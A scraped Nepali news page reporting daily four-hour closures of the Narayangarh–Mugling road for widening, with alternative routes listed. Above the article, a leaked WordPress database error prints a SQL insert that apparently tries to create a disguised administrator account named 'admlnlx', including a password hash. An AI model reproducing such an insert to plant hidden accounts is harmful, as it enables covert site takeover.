WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjSMnGKXIhIvuMFq80e2H.CsPHQKey.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:48:47', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ७ –
सडक विस्तारका लागि बिहीबारदेखि नारायणगढ–मुग्लिन सडकखण्ड दैनिक चारघण्टा बन्द गरिँदैछ ।
बिहान ११ बजेदेखि दिउँसो ३ बजेसम्म यो सडकखण्डमा गाडी नचल्ने नारायणगढ–मुग्लिन सडकखण्ड आयोजनाका सूचना अधिकृत शिव खनालले जानकारी दिनुभयो । दैनिक चार घण्टा सडक बन्द हुने भएकाले वैकल्पिक मार्ग प्रयोग गर्न उहाँले आग्रह गर्नुभयो ।
यो सडकखण्ड हुँदै पूर्व जाने साना गाडी काठमाण्डूको बल्खु, दक्षिणकाली सडकखण्ड हुँदै हेटाैडा निस्कन सक्नेछन् भने यात्रुबाहक बस र ट्रक ट्याङकरले विपी राजमार्ग तथा बाइरोडको बाटो प्रयोग गर्न सक्नेछन् ।
काठमाडौं, भक्तपुर, बनेपा हुँदै बर्दिवास निस्कने विपी राजमार्ग र नागढुंगा नौबिसे हुँदै बाइरोडको बाटो प्रयोग गर्न सक्ने नारायणघाट मुग्लिन सडकखण्ड आयोजनाका सूचना अधिकृत शिव खनालले बताउनुभयो । यस्तै पश्चिचम जाने/आउने गाडीले मुग्लिनबाट पोखरा–स्याङजा–वालिङ हुँदै बुटवल निस्केर गन्तव्यमा पुग्न सक्नेछन् ।